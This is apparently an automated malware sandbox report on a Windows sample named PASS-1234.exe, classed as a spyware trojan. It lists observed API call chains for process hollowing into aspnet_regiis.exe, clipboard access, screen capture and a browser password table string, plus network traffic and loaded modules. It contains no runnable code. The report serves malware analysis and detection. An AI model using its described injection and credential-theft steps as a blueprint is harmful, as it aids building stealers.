Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49990 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49992 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49994 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_031A2FF0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_031A2FF0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_05711000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

3_2_05711000

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_031A2FF0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_031A2FF0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_031A41B0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

3_2_031A41B0

System Summary

PE file contains section with special chars

Source: PASS-1234.exe

Static PE information: section name: C;FTo

PE file has nameless sections

Source: PASS-1234.exe

Static PE information: section name:

Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_6D387E40 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,CreateProcessW,NtGetContextThread,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtAllocateVirtualMemory,NtWriteVirtualMemory,CloseHandle,CloseHandle,NtCreateThreadEx,		0_2_6D387E40
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_6D3863E0 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,		0_2_6D3863E0

Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BB4820	0_2_00BB4820
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BB6860	0_2_00BB6860
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BB7170	0_2_00BB7170
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BC5150	0_2_00BC5150
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BCE940	0_2_00BCE940
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BB83F0	0_2_00BB83F0
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B99B3A	0_2_00B99B3A
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BCF330	0_2_00BCF330
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BB5B60	0_2_00BB5B60
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BE9490	0_2_00BE9490
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BCEC10	0_2_00BCEC10
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B99C68	0_2_00B99C68
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B985BA	0_2_00B985BA
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BD0590	0_2_00BD0590
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BCBDC0	0_2_00BCBDC0
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BE8E10	0_2_00BE8E10
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BB3E00	0_2_00BB3E00
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BB7600	0_2_00BB7600
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B97668	0_2_00B97668
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B9D7F9	0_2_00B9D7F9
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BE97E0	0_2_00BE97E0
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_6D387E40	0_2_6D387E40
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_6D381930	0_2_6D381930
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_6D3863E0	0_2_6D3863E0
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_6D399531	0_2_6D399531
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_6D381000	0_2_6D381000
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_6D38EB40	0_2_6D38EB40
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_6D3843A0	0_2_6D3843A0
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_6D387220	0_2_6D387220
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BEB120	0_2_00BEB120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0317AB30	3_2_0317AB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0317D37F	3_2_0317D37F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03196B60	3_2_03196B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031913D0	3_2_031913D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031AFA20	3_2_031AFA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03180997	3_2_03180997
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0317D9CE	3_2_0317D9CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031A88E0	3_2_031A88E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03183756	3_2_03183756
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031927AF	3_2_031927AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0319CE11	3_2_0319CE11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03192E22	3_2_03192E22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031786D0	3_2_031786D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03193450	3_2_03193450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031B0440	3_2_031B0440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0319C31F	3_2_0319C31F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03189B00	3_2_03189B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03186322	3_2_03186322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0318ABC0	3_2_0318ABC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0319F23E	3_2_0319F23E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031AD25E	3_2_031AD25E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03184250	3_2_03184250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03178A40	3_2_03178A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0318DA40	3_2_0318DA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03195A7F	3_2_03195A7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03176270	3_2_03176270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031A9260	3_2_031A9260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031AF260	3_2_031AF260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03193A90	3_2_03193A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031792B0	3_2_031792B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031742D0	3_2_031742D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031A12C0	3_2_031A12C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0319C2C6	3_2_0319C2C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031AF110	3_2_031AF110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03196130	3_2_03196130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03199129	3_2_03199129
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03173920	3_2_03173920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0318E120	3_2_0318E120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0319D150	3_2_0319D150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03175960	3_2_03175960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0319219F	3_2_0319219F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031AF1C0	3_2_031AF1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031889FD	3_2_031889FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031909F0	3_2_031909F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0319D819	3_2_0319D819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03192070	3_2_03192070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03199862	3_2_03199862
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03186322	3_2_03186322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031B00B0	3_2_031B00B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031988D4	3_2_031988D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031870CA	3_2_031870CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031A68FE	3_2_031A68FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031AE8F6	3_2_031AE8F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0319A0E0	3_2_0319A0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03196F10	3_2_03196F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031A7F10	3_2_031A7F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03172F00	3_2_03172F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03176700	3_2_03176700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03196F30	3_2_03196F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03179770	3_2_03179770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03187F96	3_2_03187F96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0319C7B2	3_2_0319C7B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031AEFA0	3_2_031AEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0319AFD0	3_2_0319AFD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031957D0	3_2_031957D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0317AFC0	3_2_0317AFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03193FF2	3_2_03193FF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031A07EF	3_2_031A07EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03178FE0	3_2_03178FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0318E630	3_2_0318E630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0317DE26	3_2_0317DE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03197E69	3_2_03197E69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0318F690	3_2_0318F690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03175EB0	3_2_03175EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031AEEB0	3_2_031AEEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0319C6D9	3_2_0319C6D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0318AEC0	3_2_0318AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0318C6F8	3_2_0318C6F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0318DD10	3_2_0318DD10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031AFD30	3_2_031AFD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031A9520	3_2_031A9520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03193D50	3_2_03193D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031AC540	3_2_031AC540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031A2D70	3_2_031A2D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031A8590	3_2_031A8590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0317C586	3_2_0317C586
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03198DA0	3_2_03198DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0318BDF0	3_2_0318BDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_0318E430	3_2_0318E430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03186C2F	3_2_03186C2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031AD45C	3_2_031AD45C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03199129	3_2_03199129
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031A9C57	3_2_031A9C57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031A6455	3_2_031A6455
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_03174C60	3_2_03174C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031964D7	3_2_031964D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031774F0	3_2_031774F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 03184240 appears 75 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 03178080 appears 41 times

Source: C:\Users\user\Desktop\PASS-1234.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 1224

Source: PASS-1234.exe, 00000000.00000000.2146853018.0000000000C4E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMadisonVioletTessa.pdfKD4 vs PASS-1234.exe
Source: PASS-1234.exe, 00000000.00000002.2208701388.000000000134E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PASS-1234.exe
Source: PASS-1234.exe	Binary or memory string: OriginalFilenameMadisonVioletTessa.pdfKD4 vs PASS-1234.exe

Source: PASS-1234.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: PASS-1234.exe

Static PE information: Section: C;FTo ZLIB complexity 1.0003192278119508

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/7@3/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_031A88E0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

3_2_031A88E0

Source: C:\Users\user\Desktop\PASS-1234.exe

File created: C:\Users\user\AppData\Roaming\gdi32.dll

Jump to behavior

Source: C:\Users\user\Desktop\PASS-1234.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1916
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4368:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\2744f6cc-0d69-4e62-9e70-1b5fe4428f27

Jump to behavior

Source: PASS-1234.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\PASS-1234.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: aspnet_regiis.exe, 00000003.00000003.2702043018.00000000058CB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701922258.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2713729437.00000000058E2000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PASS-1234.exe	String found in binary or memory: -addpset
Source: PASS-1234.exe	String found in binary or memory: -addfulltrust
Source: PASS-1234.exe	String found in binary or memory: -addgroup
Source: PASS-1234.exe	String found in binary or memory: -help

Source: C:\Users\user\Desktop\PASS-1234.exe

File read: C:\Users\user\Desktop\PASS-1234.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PASS-1234.exe "C:\Users\user\Desktop\PASS-1234.exe"
Source: C:\Users\user\Desktop\PASS-1234.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PASS-1234.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\Desktop\PASS-1234.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 1224
Source: C:\Users\user\Desktop\PASS-1234.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PASS-1234.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
